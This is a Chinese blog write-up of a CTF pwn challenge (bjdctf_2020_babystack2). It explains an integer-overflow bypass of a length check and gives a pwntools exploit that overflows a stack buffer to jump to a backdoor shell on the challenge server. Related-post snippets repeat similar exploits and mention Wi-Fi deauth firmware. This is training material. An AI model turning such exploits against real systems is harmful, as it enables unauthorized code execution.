BUUCTF|PWN-bjdctf_2020_babystack2-WP

最新推荐文章于 2023-10-22 18:11:21 发布
最新推荐文章于 2023-10-22 18:11:21 发布
阅读量383 收藏 1
点赞数 1
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/121236282
版权

1.例行检查保护机制

 

2.我们用64位的IDA打开该文件

shift+f12查看关键字符串,我们看到关键字符串"/bin/sh"

然后我们找到后门函数的地址:backdoor_addr = 0x0400726

 

 

 

 3.我们看看main函数里面的内容

 我们看到第一个nbytes是有符号数,第二个nbytes就变成了无符号数

我们判断这是一个整数溢出

所以

-1 = 4294967295

 4.EXP

#encoding = utf-8
from pwn import * 

context(os = 'linux',arch = 'amd64',log_level = 'debug')
content = 0

def main():
	if content == 1:
		p = process('bjdctf_2020_babystack2')
	else:
		p = remote('node4.buuoj.cn',25369)
	#.text:0000000000400726 backdoor
	backdoor_addr = 0x0400726
	payload = b'a' * (0x10+0x8) + p64(backdoor_addr)
	
	p.recvuntil("Please input the length of your name:\n")
	p.sendline('-1')
	
	
	p.recvuntil("What's u name?\n")
	p.sendline(payload)
	p.interactive()
main()

 

L__y
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF buuoj pwn-----第10题: bjdctf_2020_babystack
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 346
[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 284
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1247
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 645
[buuctf]bjdctf_2020_babystack
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
Python库 | pwn-machine-1.1.tar.gz
03-11
python库。 资源全名:pwn-machine-1.1.tar.gz
【CTF】BUUCTF-bjdctf_2020_babystack1
weixin_53394081的博客
03-06 362
PWN
BUUCTF(pwn)bjdctf_2020_babystack
半岛铁盒的博客
03-29 419
from pwn import * p = remote("node3.buuoj.cn",27955) sys = 0x04006E6 p.sendlineafter("[+]Please input the length of your name:\n",'200') payload = 'a' * (0x10 + 0x8) + p64(sys) p.sendlineafter("[+]What's u name?\n",payload) p.interactive() 有疑问的欢迎留言∑ ...
BUUCTF】bjdctf_2020_babystack2
m0_51251108的博客
12-30 312
BUUCTF】bjdctf_2020_babystack2 64位,无canary 有后门函数 这题思路就是用无符号和有符号整型来绕过10的比较 比如:送入一个-1,无符号类型会把它看成一个很大的正整数,是,而有符号则认为是-1 这题size_t是一种无符号整型,下面被强转成有符号,最后又强转成无符号 所以可以绕过 exp: from pwn import* r=remote('node3.buuoj.cn',29907) context.log_level = 'debug' backdoor=0
【CTF】bjdctf_2020_babystack2
凉水的博客
06-30 613
bjdctf_2020_babystack2
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1334
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
bjdctf_2020_babystack2
m0sway的博客
04-04 384
bjdctf_2020_babystack2 WriteUp BUU_PWN
[BJDCTF 2020]babystack2.0
最新发布
llovewuzhengzi的博客
10-22 148
不存在file.plt[“backdoor”] plt是外部函数才有的 只能用file.symbol[“backdoor”]HIDWORD作用是取得某个8字节变量(即32位的值)在内存中处于高位的四个字节,即两个word长的数据。LODWORD作用是取得某个8字节变量(即32位的值)在内存中处于低位的四个字节,即两个word长的数据。用file.plt[“system”]不行,因为直接这样覆盖返回地址没有参数。IDA的栈不完全对,保存的ebp都没有显示,所以IDA只能参考。
[BUUCTF-pwn]——bjdctf_2020_babyrop
Y_peak的博客
02-12 287
[BUUCTF-pwn]——bjdctf_2020_babyrop 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop 还是先checksec 一下 在IDA中看看 利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串. 因为64位,所以找下pop指令 思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
bjdctf_2020_babystack
z1r0的博客
12-04 228
bjdctf_2020_babystack 查看保护 可以控制size,所以想怎么pwn就怎么pwn,ret2text。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27112) else: r = process(file_name) elf
攻防世界pwn-forgot
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值